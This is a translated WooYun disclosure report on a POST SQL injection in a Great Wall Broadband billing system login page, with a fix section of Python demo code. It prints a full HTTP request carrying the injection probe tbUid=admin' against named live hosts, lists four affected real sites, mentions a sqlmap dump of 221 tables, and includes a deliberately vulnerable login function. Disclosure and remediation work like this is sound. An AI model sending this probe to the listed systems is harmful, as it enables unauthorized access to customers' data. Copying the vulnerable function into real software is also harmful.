
Vulnerability summary

Defect ID: wooyun-2015-0129684

Title: A billing system used by Great Wall Broadband (长城宽带) has a generic POST SQL injection vulnerability (affects multiple instances)

Vendor: Great Wall Broadband (长城宽带)

Author: 路人甲

Submitted: 2015-08-10 09:39

Fixed: 2015-11-09 14:32

Published: 2015-11-09 14:32

Type: SQL injection

Severity: High

Self-assessed rank: 17

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-10: Details reported to the vendor; awaiting vendor handling
2015-08-11: Vendor confirmed; details disclosed to the vendor only
2015-08-14: Details opened to third-party security partners
2015-10-05: Details disclosed to core white hats and domain experts
2015-10-15: Details disclosed to regular white hats
2015-10-25: Details disclosed to intern white hats
2015-11-09: Details disclosed to the public

Brief description:

A billing system used by Great Wall Broadband has a generic POST SQL injection vulnerability (affects multiple instances)

Detailed description:

I wanted to get broadband at home, so I searched Baidu for local providers and found Great Wall Broadband.
Then I found the following: the Great Wall Broadband billing system has a POST injection. I searched Baidu for the keyword
长城宽带计费系统登陆 (Great Wall Broadband billing system login) and found many instances across the country; it is a system used by Great Wall Broadband agents nationwide.

Proof of vulnerability:

[Screenshot: 搜狗截图15年07月27日1430_22.png]

POST /login.aspx HTTP/1.1
Host: help.szgwbn.net.cn
Content-Length: 495
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://help.szgwbn.net.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://help.szgwbn.net.cn/login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_11333d608f68408aeae2d69bbb4b361f=1437969558; Hm_lpvt_11333d608f68408aeae2d69bbb4b361f=1437969559; ASP.NET_SessionId=5r2poe55ynr1dmi5fg0vobab; CheckCode=04NJH
__VIEWSTATE=%2FwEPDwUKMTUwMDAxOTQ3Ng9kFgICAQ9kFgICCQ8PFgQeBFRleHQFceacjeWKoeWZqOaXoOazleWkhOeQhuivt%2BaxguOAgiAtLS0%2BIOWtl%2BespuS4siAnYWRtaW4nJyDlkI7nmoTlvJXlj7fkuI3lrozmlbTjgIIKJ2FkbWluJycg6ZmE6L%2BR5pyJ6K%2Bt5rOV6ZSZ6K%2Bv44CCHgdWaXNpYmxlZ2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQVidG5xZNkj0%2F5ZT01ReHK2HFMynZIeiiIr&__EVENTVALIDATION=%2FwEWBQK4nrW%2BAwLHvZLYDQK8963WBQL944T5DwKMk7GmBBZRR4zuYuWw50BgvO0NfXbyoaMu&tbUid=admin%27&tbPasswd=aaaa&tbCheckCode=04njh&btnqd.x=21&btnqd.y=0

[Screenshot: sqlmap.png]

[Screenshot: sbssbsbsb.png]

http://bill.szgwbn.net.cn/
http://help.szgwbn.net.cn/
http://alipay.gwbnsd.com
http://zfw.xmgwbn.com/

For now, four cases from around the country are listed. The main concern is that the impact is fairly large: the plans and all kinds of other information of every Great Wall Broadband user can be viewed.

[Screenshot: 搜狗截图15年07月27日1336_17.png]

[Screenshot: xinxi1.png]

[Screenshot: 搜狗截图15年07月27日1223_5.png]

[Screenshot: 搜狗截图15年07月27日1304_9.png]

[Screenshot: 搜狗截图15年07月27日1303_7.png]

[Screenshot: 搜狗截图15年07月27日1304_8.png]

[221 tables]

Fix:
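The report's probe sends tbUid=admin' and relies on the resulting database error to confirm the injection. As an added example (not code from the original report or from the billing system), the following shows the underlying defect and its fix side by side: a login query built by string concatenation fails with a syntax error on that input, while a parameterized query treats it as plain data and simply denies the login. It assumes sqlite3 as a stand-in for the real backend; the table name, column names and the form bodies are constructed for the demo.

```python
import sqlite3
from urllib.parse import parse_qs


def make_db():
    # Constructed: a tiny in-memory operator table standing in for the
    # billing system's real user table (assumption, not the system's schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (uid TEXT, passwd TEXT)")
    conn.execute("INSERT INTO sys_user VALUES ('admin', 'secret')")
    return conn


def login_vulnerable(conn, uid, passwd):
    # Defect: form input is spliced into the SQL text, so a quote in tbUid
    # changes the statement's structure (or breaks it with a syntax error).
    sql = f"SELECT COUNT(*) FROM sys_user WHERE uid = '{uid}' AND passwd = '{passwd}'"
    return conn.execute(sql).fetchone()[0] == 1


def login_fixed(conn, uid, passwd):
    # Fix: bind the input as parameters; the driver never parses it as SQL.
    sql = "SELECT COUNT(*) FROM sys_user WHERE uid = ? AND passwd = ?"
    return conn.execute(sql, (uid, passwd)).fetchone()[0] == 1


def classify(conn, body):
    """Run one form body through both handlers.

    Returns 'ok' (login accepted), 'denied' (no match) or 'error'
    (the database rejected the statement) for each handler.
    """
    form = parse_qs(body)
    uid = form.get("tbUid", [""])[0]
    passwd = form.get("tbPasswd", [""])[0]
    results = {}
    for name, handler in (("vulnerable", login_vulnerable), ("fixed", login_fixed)):
        try:
            results[name] = "ok" if handler(conn, uid, passwd) else "denied"
        except sqlite3.Error:
            results[name] = "error"
    return results


# Constructed: only the form fields of the report's request (VIEWSTATE omitted).
PROBE_BODY = "tbUid=admin%27&tbPasswd=aaaa&tbCheckCode=04njh&btnqd.x=21&btnqd.y=0"
LEGIT_BODY = "tbUid=admin&tbPasswd=secret"

if __name__ == "__main__":
    db = make_db()
    print("probe:", classify(db, PROBE_BODY))
    print("legit:", classify(db, LEGIT_BODY))
```

The 'error' outcome of the vulnerable handler is exactly the signal an error-based injection tool keys on, so beyond parameterizing queries, the login page should also return a generic failure message rather than the database's error text.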

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2015-08-11 14:30

Vendor reply:

CNVD has confirmed the situation described and has notified the website's operating organization (the software vendor) through the contact details published on the website (or through previously established handling channels).

Latest status:

None yet